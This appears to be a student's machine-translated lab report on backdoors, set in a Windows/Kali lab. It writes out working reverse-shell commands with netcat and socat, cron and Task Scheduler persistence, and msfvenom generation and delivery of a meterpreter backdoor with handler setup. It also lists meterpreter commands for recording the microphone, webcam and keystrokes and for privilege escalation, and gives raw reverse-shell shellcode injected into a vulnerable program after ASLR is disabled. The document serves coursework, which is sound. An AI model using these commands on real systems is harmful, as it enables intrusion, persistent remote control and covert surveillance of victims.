table of Contents
- 1. back door concept
- 2. Common backdoor
- 3. Start the back door
- 3.1 netcat get the host operating Shell, cron start
- 3.2 socat get the host operating Shell, plans to start the task
- 3.3 MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and the host operating acquired Shell
- 3.4 MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
- 3.5 plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
- 4. Harvest thoughts
- 5. questions answered
1. back door concept
- The back door is not accessible through the normal certification process and channel system.
2. Common backdoor
2.1 NC or netcat
- Also known as nc, ncat
- http://nc110.sourceforge.net/
- http://netcat.sourceforge.net/
2.1.1 Win obtain Linux Shell
In Windows uses
ipconfig
to view the local IP
Use ncat.exe program
ncat.exe -l -p 5322
open to listen and check the connectivity of windows and linux
In kali rebounded connected Windows,
ncat 192.168.132.1 5322 -e /bin/sh
, using the-e
option to perform shell program
Obtaining a linux shell under Windows, it can be run any command, such as
ls
2.1.2 Linux get Win Shell
In the kali install net-tools, before you can use use the
ifconfig
command to view the IP
Open monitoring
nc -l -p 5322
In Windows rebound in connection kali,
ncat.exe -e cmd.exe 192.168.132.138 5322
kali successful Windows command prompt
* 2.1.3 Mac Gets Win shell
* 2.1.4 Win obtain Mac Shell
* 2.1.5 Mac get Linux Shell
* 2.1.6 Linux Gets Mac Shell
2.1.7 Netcat expansion of knowledge
Transmitting data using nc
- Listening port under Windows 5322,
ncat.exe -l 5322
- kali rebound port to connect to a Windows 5322,
nc 192.168.132.1 5322
- The connection is established, the two sides can transmit data to each other
Use nc transfer files (the files from kali passed Windows)
- Listening port under Windows 5322, and save the received data to file1.out in, ncat.exe -l 5322> file1.out
- kali rebound port to connect to a Windows 5322, nc 192.168.132.1 5322 <file1.in
- The connection is established, Windows can receive files sent by kali
2.2 Meter Preter
- Is a backdoor program.
- The traditional understanding is: someone to write a backdoor, we make use of them.
- Later, some cattle do, wanted to write a platform to generate backdoors. This platform does, the back door
- Basic functions (basic connectivity, executing instructions),
- Extensions (such as collecting user information, installation services and other functions),
- Coding mode,
- Operating platform,
- And operating parameters
- Part or all made adjustable parameters. When used in combination as needed, you can generate an executable file.
- Typical platform will include:
- intersect
- Metaspolit of msfvenom instructions
- Veil-evasion
- Parameter Description
-p
payload using, payload translated as payload, is to be transported something. Here windows / meterpreter / reverse_tcp is a piece of shellcode.-x
Executable file template to use, payload (shellcode) is written into the executable file.-e
Encoder used, for shellcode deformation, in order to avoid killing.-i
The number of iterations of the encoder. I.e., use of the above encoder 5 encodes.-b
badchar payload is to be removed in character.LHOST
IP is connected bounce backLPORT
It is connected back to port-f
Type of document generation>
To which the output file
3. Start the back door
3.1 netcat get the host operating Shell, cron start
crontab -e
Increasing a timed task instructions,-e
expressed editing. Because it is the first time editing, it is prompted to select the editor, choose here is the3
The last line add 58 * * * * / bin / netcat 192.168.132.1 5322 -e / bin / sh, which means reverse connection of Windows hosts in the 58th minute of every hour port 5322
linux windows connected at 58 minutes, which is connected to a bounce back door, available shell after listening windows connection
3.2 socat get the host operating Shell, plans to start the task
- Right-click
我的电脑
, click管理
Click
任务计划程序
, then click创建任务
Fill in the name of the task, create a new trigger
New Action and select the program or script
socat.exe
path, add a column to fill in the parameterstcp-listen:5322 exec:cmd.exe,pty,stderr
After creating display task ready
Upon arrival 21:25, when turned on again, you can create a discovery task is running
A pop-up window on their own cmd
Kali the input instruction
socat - tcp:192.168.132.1:5322
, to complete the connection, obtaining windows shell
3.3 MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and the host operating acquired Shell
Use linux
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exe
generating backdoor
windows use
ncat.exe -lv 5322 > backdoor5322.exe
, check the connection status
linux using
nc 192.168.132.1 5322 < backdoor5322.exe
transmission backdoor, after the successful transfer windows will prompt
Successfully transmitting and receiving files
- linux use
msfconsole
to enter msf console and type the following command:
使用监听模块,设置payload:use exploit/multi/handler
使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
linux的IP地址:set LHOST 192.168.132.138
使用相同的端口:set LPORT 5322
查看设置:show options
After entering the msf console interface:
After the input command interface:
linux use
exploit
to start listening, and run the backdoor in windows, linux successfully obtained the windows shell
3.4 MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
Use
record_mic
instructions can intercept an audio
Use
webcam_snap
instructions can use the camera to take pictures
Use
keyscan_start
instructions recorded keystrokes process, usekeyscan_dump
instruction to read recorded keystroke
Use
screenshot
instructions can be screenshots
Use
getuid
command to view the current user, use thegetsystem
instructions mention the right to operate
3.5 plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
- In the Exploit DataBase search for
linux/x86 - Reverse
shellcode to download and extract bounce connected machine code which:
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80
Use linux
echo "0" > /proc/sys/kernel/randomize_va_space
Close address randomization
- Using the following command to enable output redirection> The
perl
resulting string is stored in the file input_shellcode:
perl -e 'print "A"x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
Open a terminal use
(cat input_shellcode;cat) | ./pwn1
injection attack this buf, then open another terminal using theps -ef | grep pwn1
findpwn1
process ID, after startinggdb
to useattach
the debugger, usedisassemble foo
to viewret
the address, set breakpoints, and then in another terminal Press Enter, and then in thegdb
inputc
continues run
Use
info r esp
Location stack pointer is located, and to change the address stored in the data view
Address is stored 0xffffd38c
, shellcode address is calculated 0xffffd38c+4
, that is0xffffd390
- Open msf console starts listening in a terminal
In another modification terminal
input_shellcode
and use thecat input_shellcode;cat) | ./pwn1
runpwn1
file
To give another terminal starts running shell
4. Harvest thoughts
- The experiment is relatively simple, but time-consuming better. The experimental operation of a process before bonus items can learn, throughout the experiment is not much difficulty. Through this experiment, I understand the basic principles of the back door, operating experience yourself, feel the dangers of the back door, and I hope in the future of the learning process can learn more knowledge.
5. questions answered
- (1) include a back door you can think of possible ways to enter your system?
- On the unofficial Web site to download the application, these procedures may bind certain executable files, leaving the back door. After clicking the link phishing sites, there may be an executable file is downloaded to your computer, leaving the back door.
- (2) How do you know exemplified by the back door to start up (win and linux) way?
- Linux: Crontab timer start; injection shellcode.
- Windows: New Task Scheduler; modify a registry key setting backdoor from the start; user execution file with the back door.
- Which gives you a profound image function (3) Meterpreter there?
- Controlled by controlling the back door of the shell host, target host can acquire audio, camera, keystroke recording and other functions.
- (4) How to find yourself the system has not been installed back door?
- Use security software, the system timing detection, killing the malicious files.
- Use Task Manager and other system software background to see if there are abnormal program.